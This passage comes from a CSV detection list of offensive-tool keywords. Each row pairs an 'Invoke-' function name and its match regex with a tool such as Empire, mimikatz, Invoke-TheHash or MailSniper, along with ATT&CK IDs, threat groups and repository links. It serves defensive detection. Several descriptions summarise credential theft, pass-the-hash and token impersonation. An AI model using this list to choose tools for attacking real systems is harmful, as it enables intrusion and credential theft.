Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-TcpEndpointsCheck*",".{0,1000}Invoke\-TcpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-TheHash*",".{0,1000}Invoke\-TheHash.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.ps1*",".{0,1000}Invoke\-TheHash\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psd1*",".{0,1000}Invoke\-TheHash\.psd1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psm1*",".{0,1000}Invoke\-TheHash\.psm1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheKatz*",".{0,1000}Invoke\-TheKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-ThirdPartyDriversCheck*",".{0,1000}Invoke\-ThirdPartyDriversCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ThreadedFunction*",".{0,1000}Invoke\-ThreadedFunction.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Thunderfox*",".{0,1000}Invoke\-Thunderfox.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-TmpDavFS*",".{0,1000}Invoke\-TmpDavFS.{0,1000}","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. 
Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","137","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" "*Invoke-TokenDuplication.ps1*",".{0,1000}Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Invoke-Tokenvator*",".{0,1000}Invoke\-Tokenvator.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UdpEndpointsCheck*",".{0,1000}Invoke\-UdpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UpdateMimikatzScript.ps1*",".{0,1000}Invoke\-UpdateMimikatzScript\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-UrbanBishop*",".{0,1000}Invoke\-UrbanBishop.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-urlcheck -urls*",".{0,1000}invoke\-urlcheck\s\-urls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - 
T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-UserCheck*",".{0,1000}Invoke\-UserCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserEnvCheck*",".{0,1000}Invoke\-UserEnvCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserGroupsCheck*",".{0,1000}Invoke\-UserGroupsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*invokeuserhunter*",".{0,1000}invokeuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to 
aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-userhunter*",".{0,1000}invoke\-userhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UsernameHarvestGmail*",".{0,1000}Invoke\-UsernameHarvestGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UsernameHarvestOWA*",".{0,1000}Invoke\-UsernameHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserRestrictedSidsCheck*",".{0,1000}Invoke\-UserRestrictedSidsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserSessionListCheck*",".{0,1000}Invoke\-UserSessionListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" 
"*Invoke-UsersHomeFolderCheck*",".{0,1000}Invoke\-UsersHomeFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VaultListCheck*",".{0,1000}Invoke\-VaultListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" 
